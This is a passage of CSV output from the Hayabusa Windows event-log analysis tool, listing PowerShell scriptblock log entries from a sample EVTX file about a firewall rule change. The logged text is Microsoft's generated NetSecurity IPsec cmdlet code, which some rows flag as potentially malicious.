ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', 
Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, 
[Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) 
$__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and 